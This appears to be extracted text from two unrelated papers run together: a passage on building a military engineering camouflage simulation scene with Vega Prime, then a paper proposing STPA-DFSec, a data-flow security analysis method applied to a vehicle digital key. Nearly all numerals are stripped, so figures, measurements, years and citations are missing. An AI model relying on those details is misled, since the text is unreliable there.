and simulation scene. the simulation model refers to all the models in the target area, and the simulation scene refers to the virtual camouflage simulation scene generated in order to achieve the effect of the engineering camouflage simulation. for engineering camouflage simulation system design and development can be divided into the following four steps to complete, and the overall system framework is shown in figure . terra vista creator camouflage generate system terrain model culture data surface layout texture material dem data ortho-photo data ground object model camouflage pattern vega custom code api real-time operation real-time application simulation scene of engineering camouflage figure . framework of simulation system a. build terrain model acquire high-precision dem data and satellite ortho-photo data of a certain region and establish a terrain model of a simulation scene in terra vista to construct the altitude and fluctuation of the surface. b. build ground object model according to the plane layout, texture material and other data of the ground surface around the simulation scene, the international conference on sensor network and computer engineering (icsnce ) ground model was constructed by multigen creator, thereby constructing the scene of military equipment, weapons and equipment, and storage camps. c. camouflage scene model according to the background and target characteristics around the simulation scene, yu’s[ ] camouflage design method was used to obtain the digital camouflage pattern, the camouflage pattern was mapped to the surface of the d model, and the disguised model was arranged in the whole scene. d. rendering and implementation the openflight api is used to programmatically export the layout information of the model, then uses vega prime and visual studio to write the real-time scheduling display program, and combines the mfc framework to generate a real-time roaming simulation scenario. iii. establish and rendering model a. the establishment of terrain model in the field of military camouflage, terrain refers to the natural state of the earth's surface. whether a target can be detected or not depends on the complexity of the terrain and the difference between target and background[ ]. terrain model is an abstract and simplified expression of real terrain attributes. therefore, it is inevitably involved in the display and processing of the d geospatial scenes in the battlefield environment simulation. the terrain visual simulation has become the hot spot of the d scene simulation research in the battlefield environment. terra vista is multigen's software for modeling complex terrain visual simulations and is used to build d terrain simulation models. terra vista manages d terrain data in a project. it is mainly composed of a terrain data source library, terrain parameter configuration, vector parameter configuration, cdb format terrain file browsing, and a model database. it runs on the windows platform and generates a terrain database in mataflight or openflight format that can be used directly on pc workstations or other graphical vision systems. terra vista builds a d terrain simulation model mainly including three steps: data loading, setting terrain parameters, and calculating & generating terrain. ) data loading it mainly includes the import of data such as elevation data, satellite image data, and vector data. first, load digital elevation data. take a certain km area of america as a camouflage scene. the more accurate the dem data is, the more realistic the terrain is, and the more detailed local details of the real terrain can be expressed. for simulation scenarios, the accuracy of the terrain grid is generally m to m. therefore, yu[ ] proposed an improved bilinear interpolation algorithm to interpolate on the basis of the original dem data, thereby improving the accuracy of dem data. m accuracy of the original elevation map and yu's method to m accuracy elevation map shown in figure . (a) m accuracy elevation map (b) m accuracy elevation map figure . m and m accuracy elevation map second, load satellite image data. use bing maps satellite to obtain satellite imagery of the area to be camouflaged. the image is a mercator projection on a sphere radius benchmark, and the srtm dem uses a geocentric projection of a wgs benchmark, so this requires format conversion. use the projection conversion tool in global mapper to convert satellite imagery into the wgs benchmark geocentric projection format. the ortho-photos obtained are shown in figure . figure . ortho-photos maps finally, load vector data. the vector data refers to the polygons in the terrain database except terrain. it can be formed naturally, such as lakes and rivers, or it can be constructed artificially, such as buildings and roads. we use satellite image to create vector data for this area by terra vista. the main rules are: to create point details for objects with limited area, location, orientation, that do not require a specific shape; to create linear details for objects that length is much larger than the width and height; to create area details for objects that occupy a large area and need to be defined on the edge of the area. ) terrain parameter settings it mainly includes the levels of detail (lod), the visual distance, the size of the grid, and the method of construct grid. terrain lod technology is a kind of terrain drawing method, which reduces the geometric complexity of the terrain scene by simplifying the details of the terrain surface step by step without affecting the visual effects of the scene, thereby improving the efficiency of the rendering algorithm. in this paper, the lod is constructed using a quadtree hierarchy, each layer divides the terrain into several grids, the next layer quarters each grid in the previous layer, and so on. each layer in the hierarchy grid is subdivided by a number of triangles. the simulation scene lod is set to international conference on sensor network and computer engineering (icsnce ) three levels, the visual distance is set to m, the terrain block is set to m× m, and denauley algorithm is used to construct a triangular mesh to generate multi-resolution geometric terrain. as shown in figure . (a) terrain model with patches (lod ) (b) terrain model with patches (lod ) (c) terrain model with , patches (lod ) figure . terrain model with different resolutions ) calculate and generate terrain use the gaming area tool to select the target area to be generated, set the format and resolution of the output texture image, determine the output model format, taking into account the later amendments in the creator, this article uses openflight format. in the process of generating the terrain model, the generated terrain is stored in the openflight model file in the unit of divided grid. finally, each model node is unified by an external reference node in the file named master.flt. figure is shown as the final geometric terrain. figure . terrain map b. build ground object model the ground object model is an important part of the battlefield environment, including natural land objects, military equipment, blockhouses, storage barracks and other important battlefield objects. multigen creator is a visual simulation software for creating d models. the basic core of the software is the modeling module, which provides a visual environment for creating and editing database files[ ]. different from common modeling tools such as dmax and maya, creator uses a hierarchical structure to describe the simulation scenario. it can conveniently organize the model according to the geometric feature and is suitable for real-time traversal operations[ ]. steps for using creator modeling are as follows: step : determine model data. for natural objects, information such as location and area is required; for buildings, they need information such as floor plan, section drawing, and three views. step : determine the hierarchical structure of the model. decompose the model according to the tree structure, such as the floor of the building, the inner wall, etc. step : using yu's algorithm[ ] to generate camouflage pattern, the selected typical background and the generated camouflage pattern are shown in the following page figure . (a) typical background (b) camouflage pattern figure . the generation of camouflage patterns. step : using texture mapping technology to figure .camouflage pattern mapping to the surface of d model, through the interactive control module rotating object or change the point of view to get a different perspective, has practical application value of camouflage target d view. finally, the d model is placed in the simulation scene according to the corresponding proportion. the ground object model is shown in figure and figure . figure . helicopter camouflage model figure . tank camouflage model c. rendering and implementation of the model real-time rendering engine is the core of camouflage simulation scene. vega prime, a real-time d visual simulation tool developed by multigen, is widely used in international conference on sensor network and computer engineering (icsnce ) military simulation[ ]. vp includes lynx prime graphical user interface configuration tool and vsg advanced cross-platform scene rendering api[ ]. this article calls vp in the environment of mfc library to implement the design of virtual real-time simulation system. the specific method is as follows: step : creates a single thread in the application to run the whole vp program, include initialization, define, configure, and frame cycles. step : adds the member function responsible for opening the thread in the view class of the mfc framework. step : uses the api function afxbegin thread to open the vp thread, and continuously refresh the vp visual window in the background program. iv. simulation results and analysis. the developed engineering camouflage scene system based vp technology is shown in figure the system interface is mainly composed of parts. among them, part is a subpanel which control to create model, including load openflight formatted data of terrain and ground object model data, generates digital camouflage pattern, and implements the camouflage to terrain and object model in the simulation scene; part is a configuration subpanel of rendering, including setting the observer, moves mode and atmospheric environment in the simulation, and implements the control of simulation scene, such as translation, scaling, rotation, etc; part is a simulation control subpanel, and control the beginning and end of the roaming of the whole simulation scene; part is a display subpanel of simulation scene, show the full face of the scenario. the user can use the pc device to roam freely in the virtual scene. the system will perform real-time rendering and updating according to the position of the movement. the user can view the layout of the simulation scene from different perspectives and positions by switching from a close-range perspective to a distant perspective. figure . camouflage scene system interface as we have seen from figure , the terrain model and object model established by this system are consistent with the feature of the regional target background. the simulated scene after the disguise has high fidelity and realistic feeling, which is not easy to be detected, which fully reflects the importance of visual simulation in camouflage. v. conclusion in this paper, we have improved the traditional engineering camouflage method through d scene simulation technology. we build a framework of vp visual simulation based on mfc, to achieve the target area terrain and object modeling and rendering, establish a d, dynamic and high fidelity simulation scene of camouflage. the result shows that, the camouflage simulation scene designed in this paper visually and truly reproduces the effect of camouflage operations in the field, enhances the user's sense of immediacy, and solved the camouflage effect evaluation in current military engineering mainly depends on the field work. it provides an effective auxiliary measure for the evaluation of engineering camouflage effect and provides a good virtual simulation platform for the design of military engineering camouflage, at the same time, this helps to reduce resource consumption for camouflage evaluation. references [ ] hu jianghua. camouflage technology[m]. beijing, national defence industry press, : - . [ ] zhang l, han j y, zhang j, et al. research of program development technology of vega prime based on mfc framework[j]. fire control & command control, , ( ): - . [ ] yao f f, liang q, xu r j, et al. study of three-dimensional virtual battlefield large terrain dynamically generated based on vega prime[j]. journal of system simulation, , ( ): - . [ ] zi-nan h u, jin-song y u. research of software integrated technology of vega prime based on mfc programming framework[j]. journal of system simulation, , ( ): - . [ ] wu g, tao j. d modeling of the relievo based on the computer active vision[c]// international conference on mechatronics, computer and education informationization. . [ ] liu p, lu z. construction and visualization of d landscape[c]// international conference on computer network, electronic and automation. ieee computer society, : - . [ ] yu jun, shuang xiao. design of imitation digital camouflage[j]. journal of applied sciences, , ( ): - . [ ] dong zhiming, guo qisheng. modeling and simulation of battlefield environment[m]. beijing, national defence industry press, : - . [ ] yu jun, lu yanxin, hu zhiyi, et al. an improved bilinear interpolation of regular grid dem[j]. journal of geomatics science and technology, , ( ): - . [ ] shao xiaodong. multigen creator modeling art[m]. xi`an, xidian university press, : - . [ ] wang n, han y, chen g. comparison analysis of modeling of virtual gis based on ds max and multigen creator[j]. bulletin of surveying & mapping, , ( ): . [ ] vega prime programmer’s guide(version . )[z]. dallas: multigen-paradigm inc. : - . [ ] wang xiaoping. vega prime real time d virtual reality development technology[m]. chengdu, southwest jiaotong university press, : - . data-flow-based adaption of the system-theoretic process analysis for security (stpa-sec) data-flow-based adaption of the system-theoretic process analysis for security (stpa-sec) jinghua yu , , stefan wagner and feng luo school of automotive studies, tongji university, shanghai, china institute of software engineering, university of stuttgart, stuttgart, germany abstract security analysis is an essential activity in security engineering to identify potential system vulnerabilities and specify security requirements in the early design phases. due to the increasing complexity of modern systems, traditional approaches lack the power to identify insecure incidents caused by complex interactions among physical systems, human and social entities. by contrast, the system-theoretic process analysis for security (stpa-sec) approach views losses as resulting from interactions, focuses on controlling system vulnerabilities instead of external threats, and is applicable for complex socio-technical systems. however, the stpa-sec pays less attention to the non-safety but information-security issues (e.g., data confidentiality) and lacks efficient guidance for identifying information security concepts. in this article, we propose a data-flow-based adaption of the stpa-sec (named stpa-dfsec) to overcome the mentioned limitations and elicit security constraints systematically. we use the stpa-dfsec and stpa-sec to analyze a vehicle digital key system and investigate the relationship and differences between both approaches, their applicability, and highlights. to conclude, the proposed approach can identify information-related problems more directly from the data processing aspect. as an adaption of the stpa-sec, it can be used with other stpa-based approaches to co-design systems in multi-disciplines under the unified stpa framework. subjects computer networks and communications, security and privacy, software engineering keywords security analysis, complex interaction, information-critical system, data flow structure, stpa-sec introduction system security is an emergent property of the system, which represents a state or condition that is free from asset loss and the resulting loss consequences. system security engineering, as a special discipline of system engineering, coordinates and directs various engineering specialties to provide a fully integrated, system-level perspective of system security and helps to ensure the application of appropriate security principles and methodologies during the system life cycle for asset protection (ross, mcevilley & oren, ). violating system security constraints causes unexpected incidents, like mission failure or leaking sensitive information, and finally leads to financial or even life losses. therefore, security needs to be considered carefully in system design. security requirement analysis, referring to the activity of analyzing systems in security-related aspects to how to cite this article yu j, wagner s, luo f. . data-flow-based adaption of the system-theoretic process analysis for security (stpa-sec). peerj comput. sci. :e doi . /peerj-cs. submitted november accepted december published february corresponding author jinghua yu, yujinghua@tongji.edu.cn academic editor leandros maglaras additional information and declarations can be found on page doi . /peerj-cs. copyright yu et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:yujinghua@�tongji.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ achieve security requirements in this research, is performed in the early security engineering phase and helps to manage system risks and make decisions. traditional security analysis approaches, being designed for former relatively simple systems, are not effective to analyze increasingly complex systems. for example, a modern vehicle is a cyber-physical system, which consists of not only tens of thousands of physical components but also large amounts of software codes. a vehicle over-the-air software update system, as a socio-technical system, refers to not only the technical parts but also social entities like data providers and regulations. however, most traditional approaches start with system decomposition and analyze the components independently, which leads to overlooking the impacts of interactions among components. besides, traditional causality models attribute accidents to an initial component failure cascading through a set of other components (like dominos) (young & leveson, ) and cannot address causes of losses with non-linear cause-and-effect linkages. to meet the requirements of modern systems, a relatively new approach for safety engineering called system-theoretic process analysis (stpa) was proposed (leveson & thomas, ) and its extension for security named stpa-sec was presented later (young & leveson, ). however, the stpa-sec does not consider non-safety but security-critical issues (e.g., data confidentiality) and lacks efficient guidance for identifying information security concepts. therefore, we propose a data-flow-based adaption of the stpa-sec (named stpa-dfsec) to overcome the mentioned stpa-sec’s limitations. the analysis process of a vehicle digital key system is presented to demonstrate how to use the proposed approach. we also analyze the same system by using the original stpa-sec and compare their outcomes. finally, we discover the relationship between concepts in both approaches and conclude the highlights and applicability of them. the rest of this article is organized as follows. in the “related work” section, we introduce the established approaches and the stpa series with research gaps. in the “methodology” section, we briefly describe the stpa and stpa-sec approaches and propose the adaption in detail. in the “case study” section, we present the analysis processes of an example case by using both original and adapted approaches to demonstrate how to use them and make the comparison. finally, we summary this article in the “conclusion” section. related work established security requirement analysis approaches we compare established approaches (other than the stpa-based ones) for security requirement analysis from several industry guidelines, like sae j (sae, ) in the automotive industry and nist cybersecurity framework for critical infrastructure (nist, ), as well as other published research. note that not all approaches use the term “requirements” explicitly. we regard all the activities that aim to identify security requirements as relevant approaches. for example, threat analysis and risk assessment (tara) is a typical activity for analyzing security problems. the outputs of tara are the yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ source of security requirements. table summarizes the investigated approaches with brief introductions and categories. with regard to the starting point, most of the mentioned approaches are threat- oriented. they start with identifying threat-related items (e.g., threat source or attack interface) of the system assets or operation scenarios. this is from the point of view of an attacker and aims to protect the system by analyzing and handling all enumerated external threats. another type is the system-oriented one, which starts with analyzing the system features (incl. structure, function or use case) and tries to find vulnerabilities of the system. threat-oriented approaches are well-structured and have been widely used in various industries. it is efficient to protect the system against known threats based on a threat database and expert experience. however, threat-oriented ways are not efficient for relatively new systems with less previous experience, and may overlook new kinds of threats. by contrast, the system-oriented approaches are more likely to handle such situations by identifying system vulnerabilities and focusing on controlling potential vulnerabilities relying less on the threat database. besides, since the external threats are continuously developing, the system-oriented ways are more efficient to ensure the system operation without being compromised regardless of the source and type of threats, just like defending a castle by reinforcing walls and not caring who is the enemy. furthermore, the system-oriented approaches are more useful for high-level decisions since they view the issues from the perspective of the whole system. table summary of established security analysis approaches other than stpa-based ones. brief introduction of established security analysis approaches (other than stpa-based ones) with their categories. approach brief introduction category nist cybersecurity framework method (nist, ) cybersecurity framework is a risk-based approach to managing cybersecurity risks of critical infrastructure published by the national institute of standards and technology (nist). five functions of the framework core are “identify”, “protect”, “detect”, “respond”, and “recover” threat-oriented; component-based evita tara process (ruddle et al., ) evita tara method was proposed in the e-safety vehicle intrusion protected applications (evita) project, which aims to design, verify, and prototype a secure architecture for automotive on-board networks threat-oriented; scenario-based tvra process (etsi, ) threat, vulnerabilities, and implementation risks analysis (tvra) is a process-driven tara methodology developed by the european telecommunications standards institute (etsi) threat-oriented; component-based octave allegro (caralli et al., ) octave allegro is a streamlined approach for information assets, as an agile variant of the operationally critical threat, asset, and vulnerability evaluation (octave), which was developed by the software engineering institute and sponsored by the u.s. department of defense threat-oriented; component-based heavens tara process (olsson, ) healing vulnerabilities to enhance software security and safety (heavens) is a systematic approach of deriving security requirements for vehicle e/e systems, including processes and tools supporting for tara threat-oriented; scenario-based fmvea (schmittner et al., ) failure mode, vulnerabilities and effects analysis (fmvea) is an approach evolved from the failure mode and effect analysis (fmea) to identify vulnerability cause-effect chains, which consists of vulnerabilities, threat agent, threat mode, threat effect, and attack probability threat-oriented; component-based chassis (raspotnig, karpati & katta, ) combined harm assessment of safety and security for information systems (chassis) is a unified process for identifying hazardous scenarios by using uml-based models (misuse cases and sequence diagrams) system-oriented; scenario-based yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with regard to the basic analysis object, the mentioned approaches can also be divided into component-based and scenario-based classes. the former class views the system as the composition of a set of assets and aims to protect them to achieve the system security, while the latter class focuses on the functional operation of a system and aims to ensure the expected system behaviors. the component-based approaches can protect essential components well and are convenient for the development management since different teams can be responsible for certain components. however, such approaches lack the consideration of the interaction among components. each component can be secure but attacks may still happen during the interactions. by contrast, the scenario-based approaches consider the interaction among components and focus on providing secure services instead of protecting system components. such approaches require a global design consideration and more management efforts for cooperation between different development teams. the previously mentioned approaches are at the process or framework level. many concrete techniques are used in practice when applying these frameworks. for example, heavens and fmvea use microsoft’s stride model (microsoft, ) to identify potential threats. the attack tree analysis is used in the evita process to analyze attacks in depth and obtain attack scenarios (ruddle et al., ). the threat and operability analysis (throp) can be used in the threat identification phase when applying the evita process at the feature level (sae, ). since the proposed approach in this article is at the framework level, techniques used in certain steps are only listed here as examples without further investigation. system-theoretic process analysis based approaches and highlights stpa is a hazard analysis approach based on the system-theoretic accident model and process (stamp), which views losses as results from interactions among various system roles that lead to violations of safety constraints and analyzes issues at the strategy level. stpa provides a powerful way to deal with complexity by using traceable hierarchical abstraction and refinement (young & leveson, ). other than safety engineering, stpa has also been extended into other fields with the same system-theoretic thought. young & leveson ( ) presented stpa for security (stpa-sec), which shares similar steps with stpa and focuses on controlling system vulnerabilities instead of avoiding threats. to perform co-analysis of safety and security under the stpa framework better, friedberg et al. ( ) proposed a novel analysis methodology called stpa-safesec, which integrates stpa and stpa-sec into one concise framework and overcomes limitations of original approaches (e.g., no considerations about non-safety security issues) by introducing security constraints and mapping abstract control structures to real components. shapiro ( ) proposed stpa for privacy (stpa-priv), which extends stpa into privacy engineering by introducing privacy concepts and considerations into the general stpa process steps. the most significant highlight of stpa-based approaches is that they shift from focusing on preventing failures and avoiding threats to enforcing safety constraints and controlling system vulnerabilities. controlling system vulnerabilities rather than reacting yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to threats is more efficient to ensure system security because controlling a vulnerability may reduce the attack risk of several threats. another highlight is that the stpa-based approaches focus more on the strategy level rather than the tactic level. the tactics are means to accomplish a specific action and are focused on physical threats, while the strategy is regarded as the art of gaining continuing advantages and is focused on abstract outcomes (young & leveson, ). the strategy view is beneficial to broaden the mind and take more aspects like organizational and managerial ones into account. therefore, the stpa-based approaches are applicable for socio-technical systems and suitable for today’s complex systems. not only physical system components but also humans, natural or social environment and their interactions are all within the scope of the stpa-based approaches. furthermore, due to the numbers of extensions of stpa in various disciplines, it is easier to perform co-design under the same stpa framework. stpa-sec applications and gaps the stpa-based security analysis approach (stpa-sec) has been used to identify system security constraints in various industries. khan, madnick & moulton ( ) demonstrated the implementation of stpa-sec to identify security vulnerabilities of a central utilities plant gas turbine use case in industrial control systems. mailloux et al. ( ) used the stpa-sec to elicit systems security requirements for a notional autonomous space system. carter et al. ( ) used stpa-sec with a previous information elicitation process to analyze a small reconnaissance unmanned aerial vehicles. a further modeling technique has also been proposed by the same researchers to support a more efficient and traceable analysis (carter et al., ). sidhu ( ) applied an stpa-sec extension with modified attack tree method to analyze cybersecurity of autonomous mining systems. wei & madnick ( ) analyzed an over-the-air software update use case in the automotive industry by using both stpa-sec and chassis and compared analysis outcomes. the stpa-sec is system-oriented and scenario-based. it has previously mentioned advantages of both system-oriented and scenario-based approaches. comparing to another system-oriented scenario-based approach chassis, the stpa-sec views the system from the perspective of the control actions and addresses more strategic issues, while the chassis analyzes the system from the functional use case aspects and pays more attention to tactical problems. besides, the chassis is more suitable for technical development phases since use cases and sequence diagrams are required when applying it. by contrast, stpa-sec can be performed at a high system level in the concept phase, in which fewer technical documents are available. nevertheless, two limitations of the stpa-sec have been found. first, it does not pay enough attention to the non-safety-related but security-critical issues, like data confidentiality. the first reason for causing such ignoring is that the security of the control action channels is not considered in the stpa-sec. for example, in a water cooling system, “increase the water flow” is a typical action to control the system temperature. the stpa-sec only analyzes insecure possibilities related to this action at a functional level but does not consider the possible insecure factors of the channels which deliver the yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ control information (or called commands) from the controller to the controlled process. another reason for ignoring some security aspects is that some objects, which are not related to the control process (i.e., not presented in the control loop structure (fig. )), are not considered. for example, in a vehicle software update system, “request” and “response” are the main control actions between the controller (e.g., an external tester) and the controlled process (e.g., electronic control units in a vehicle). the stpa-sec mainly focuses on factors that may lead to losses related to these two control actions (e.g., an illegal request is accepted or a valid response is dropped). however, whether the data during the request or response is monitored illegally can not be identified directly by the stpa-sec since the data confidentiality is not presented in the system stamp model. the second limitation is that it lacks guidance when identifying information- security-related concepts including insecure behaviors and intended causal scenarios. the stpa-sec inherits the stpa guide words to identify insecure control actions and uses components and interactions in the control loop as the “clues” to generate viable scenarios (young & leveson, ). such safety-oriented identification methods may not efficient and direct to address information security problems. other researchers also pointed out similar limitations of the stpa-sec. schmittner, ma & puschner ( ) reported that the original stpa-sec lacks guidance for intended causal scenarios, excludes considerations of the data exchange which is not directly connected to the process control and cannot cover more information-security centric properties such as confidentiality. torkildson, li & johnsen ( ) also found that some essential security issues can be overlooked and recommended to strengthen stpa-sec by combining it with data-flow-based threat models. however, torkildson’s approach converts the stpa control structure into a data flow diagram by simply replacing control action and feedback paths with data channels. although such a data flow diagram helps to identify more data-related threats than using stpa-sec alone, this diagram based on the original control loop does not view the system from the data aspect initially and may also overlook security issues that are not related to the control processes. controller controlled process control algorithm process model control actions feedback actuator sensor figure general control loop (karatzas & chassiakos, ). general control loop structure of the stpa framework. full-size doi: . /peerj-cs. /fig- yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ furthermore, the stpa-sec approach regards the security issue as one of the key threats affecting system safety (wei & madnick, ) and only supports the identification of safety-related security goals (martin et al., ). non-safety-related security issues like confidentiality may be overlooked. to sum up, the stpa-sec can address safety-related security problems, while the proposed stpa-dfsec reorients the scope of the stpa-based security analysis approach to consider more non-safety-related but information security problems. furthermore, efficient guidance is needed to better support such information security analysis based on the stpa framework. methodology brief introduction of stpa and stpa-sec we briefly introduce the original stpa framework as the basis of the proposed approach in this section. stpa starts with defining the purpose of the analysis, including system-level losses, hazards, and constraints. losses are about something valuable and unacceptable to the stakeholders. a hazard is a system state or set of conditions that, together with a particular set of worst-case environmental conditions, will lead to a loss. finally, system constraints can be derived from identified hazards, which specify system conditions or behaviors that need to be satisfied to prevent hazards and ultimately prevent losses (leveson & thomas, ). then, the control structure needs to be built to describe relationships and interactions by modeling the system as a set of control loops (show in fig. ). the third step is to identify unsafe control actions, which will lead to a hazard in a particular context and worst-case environment (leveson & thomas, ), based on the previously built structure. four ways of being unsafe are provided in stpa as guide words for the identification. finally, loss scenarios, which describe the causal factors that can lead to unsafe control actions, are identified. two types of loss scenarios must be considered, which are “scenarios that lead to unsafe control actions” and “scenarios in which control actions are improperly executed or not executed” (leveson & thomas, ). each identified scenario represents a system failure that needs to be controlled by designers. the stpa-sec, as an extension for security considerations, shares the same basic steps. vulnerabilities, instead of hazards, are identified in the first step since vulnerabilities lead to security incidents, which is just like hazards lead to safety incidents (young & leveson, ). similarly, final identified loss scenarios represent system vulnerabilities that need to be controlled. stpa-dfsec approach the proposed stpa-dfsec follows the general stpa framework but introduces a data-flow-based structure for information security considerations. the main steps are described as follows. yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step : define the purpose of the analysis being similar to the stpa-sec, the first step is to identify system-level losses, vulnerabilities, and constraints to figure out what are unacceptable results that need to be avoided at the system strategy level. to help to identify losses, the stpa-dfsec provides general guidance for loss identification based on the study (yu & luo, ) of various safety- and security-related definitions from standards and technical documents in industries like iso (iso, ) and sae j guidebook (sae, ). all possibilities of losses at a high abstract level are listed in table . the loss list of a particular case is a subset of this general list and can be described concretely according to practical situations. vulnerabilities are system weaknesses that may lead to losses under external force. general security attributes like confidentiality, integrity, and availability (called c.i.a. triad model) can be used as guide words to classify the security problems and elicit potential vulnerabilities. finally, system-level constraints can be easily obtained by simply inversing the vulnerabilities or describing how to minimize the losses if the vulnerabilities are exploited (leveson & thomas, ). step : model functional interaction structure instead of the control structure, a functional interaction structure (fis) based on data flows is created to interpret how the system works from the perspective of data flows. we choose the data-flow-based diagram because data is the carrier of information. to view a system from the perspective of data flows is a more direct and efficient way to consider information security problems. a component can be decomposed into a set of functions. each function is a basic data process unit to handle the input data and output processed data. data flow channels are the bridges between different functions to exchange information to finally accomplish overall system missions. the interactions between fis components are viewed as the data exchanges between peer functions in different components. the data flow channels between different components are via the physical communication channels (e.g., cables and wireless channels), while the interactions among functions in one component go through the logical channels (e.g., via global variants and function parameters). a function works based on its inputs and algorithms and outputs results. the processing environment, together with inputs and algorithms, will affect function behaviors and final outputs. inputs and outputs, instead of control actions and feedback, table general list of losses. recommended high-level losses for the initial loss identification step. label loss description l- loss of life or cause injury to life includes human and animal life l- loss of physical property represents physical objects belonging to stakeholders (e.g., devices) l- loss of non-physical property represents virtual properties belonging to stakeholders (e.g., sensitive information, reputation) l- loss of environment includes the natural or artificial world yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are interactions between components in fis. figure shows a general interaction structure with arrows as data flows and the elements of a function. the fis is created based on high-level system description files, which describe the overall system purpose, general architecture with main components, and functional requirements related to the data process. how concrete an fis is depends on how detailed the description files are. functions in an fis are identified from the perspective of the data process. a common function set (see table ) is provided to help the establishment of the system fis. the enumerated cryptography-related functions are derived from the cryptographer’s toolbox, which consists of six kinds of cryptography mechanisms (symmetric key algorithm, asymmetric key algorithm, message authentication code, digital signature, one-way hash function, and random number generation) (schneier, ). users can pick the enumerated functions to build their system fis at a general level or refine the function in particular cases if detailed information is available. other possible case-specific functions derived from the system descriptions can also be added to the structure. this function database can be extended and refined by the development team to make the database more practical for particular design domains. for example, the “transmit data to” function can be refined as “transmit data via can bus to” or “transmit data via wifi to” if the communication channel between components is known at this design stage. different communication media has different initial security vulnerabilities which can lead to further specific analysis. the “encrypt plain text by x” can be refined as “encrypt plain text by aes- -cbc algorithm” or “encrypt plain text by aes- -cbc function component bcomponent a algorithms function inputs outputs environment function a- function a- function b- function b- general fis figure general fis and its basic element “function”. general functional interaction structure of the proposed approach and the details of its basic element (called “function”). full-size doi: . /peerj-cs. /fig- table enumerated common functions for fis. enumeration of commonly used functions in the functional interaction structure, including data process and communication functions and cryptography- related functions. classes functions data process and communication functions process plain data; transmit data to; receive data from; validate received data (according to specifications, e.g., format and value range) cryptography-related functions encrypt plain text by x; decrypt cipher text by x; calculate signature; validate signature; calculate mac, validate mac; other functions (e.g., key management related function, depends on available information) yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm”. the execution time of these functions are different and should be considered when identifying timing-related losses. therefore, by the refinement, analysts can further consider the security vulnerabilities related to the concrete function characteristics (e.g., transmission media or cryptographic algorithms) and obtain more specific outcomes finally. note that when identifying functions and their interactions, analysts only need to focus on the system function aspect. potential attributes of functions or interactions like the real-time capacity do not need to be considered in this step. possible threats to the system security caused by such attributes will be addressed in later steps. for example, we do not consider the real-time performance when constructing an fis. however, the insecure functional behavior related to the poor real-time capacity of a function or interaction will be identified by using the guide word “being executed but exceeding the time limits causing vulnerabilities”. step : identify insecure function behaviors from the established fis, insecure function behaviors (ifb), which are behaviors that will lead to a system vulnerability in a particular context like a worst-case environment, can be identified with the help of guide words. table is the template for identifying ifbs with guide words (gw) adapted from the stpa unsafe control action (uca) ones. for identifying the “not being executed causes vulnerabilities” ifbs, it is helpful to consider if a function has the possibility of being bypassed or rejected but pretending to have been executed correctly. for identifying the “being executed causes vulnerability” ifbs, the possible weaknesses of the function execution conditions (e.g., inputs and execution context) are considered. as for the “being executed but exceeding time limits causes vulnerabilities” ifbs, whether the timeout will lead to the vulnerabilities is taken into account. how detailed an ifb is described depends on the information available. in any case, the analysis can be done with basic system information at a high system level. step : identify loss scenarios finally, loss scenarios (ls), as possible causes of ifbs, are identified. the guide words for identifying lss are proposed based on the basic elements of a function. table is the template for identifying lss with two classes of guide words. the “function itself” class helps to identify loss scenarios with causes from the function side, while the “execution environment (env)” class refers to loss scenarios caused by the external factors. table template for identifying ifbs. template for identifying insecure function behaviors with three guide words. function (f) gw: not being executed causes vulnerabilities (necv) gw: being executed causes vulnerabilities (ecv) gw: being executed but exceeding time limits causes vulnerabilities (etl) s_fn s_fn_ifb_m s_fn_ifbm + s_fn_ifbm + (e.g.) “encrypt data” function function is bypassed but returns a fake ok result. data is encrypted by a forged key (provided by attacker). data encryption violated the process time limit. notes: adapted from the stpa uca guide word “not providing causes hazard”. adapted from the stpa uca guide word “providing causes hazard”. adapted from the stpa uca guide words “too early, too late, out of order” and “stopped too soon, applied too long”. s_fn_ifbm is the ifb label, in which s represents the subject of the function. yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ each loss scenario represents a system vulnerability that should be controlled by designers or operators. detailed system constraints can also be derived from loss scenarios by inversing the conditions of loss scenarios or defining what the system must do in case the incident occurs. system constraints are inputs for further design phases. summary table summarizes the process steps of both the stpa-dfsec and stpa-sec with highlights of differences, in which “+” denotes added features of the stpa-dfsec and “*” represents modified steps in comparison with the original stpa-sec. case study use case definition and assumption in this section, a bluetooth digital key system of a vehicle is introduced as a toy example, which consists of three main physical components and aims to lock or unlock vehicle doors by a smartphone. communication between different entities via wireless channels are protected by cryptographic mechanisms. the high-level sequence diagram of two main services, as the input of the analysis, is shown in fig. to describe how the table template for identifying lss. template for identifying loss scenarios with five guide words. ifbs gw: function itself gw: env- function inputs gw: env- calling behaviors gw: env- computing resources gw: env- links s_fn_ ifbm s_fn_ ifbm_lsp s_fn_ ifbm_lsp + s_fn_ ifbm_lsp + s_fn_ ifbm_lsp + s_fn_ ifbm_lsp + (e.g.) encryption process violates the time limits process algorithm is modified, which leads to the timeout input size exceeds the limits but is not detected / computing resource is occupied by others maliciously / (e.g.) data leaks in the transmission no or inadequate anti- leakage mechanism is used / / / transmission channel is monitored illegally table summary of stpa-dfsec and stpa-sec steps. summary and comparison of stpa-dfsec and stpa-sec approaches with differences marked. basic four steps stpa-dfsec details stpa-sec details step : define the purpose of the analysis 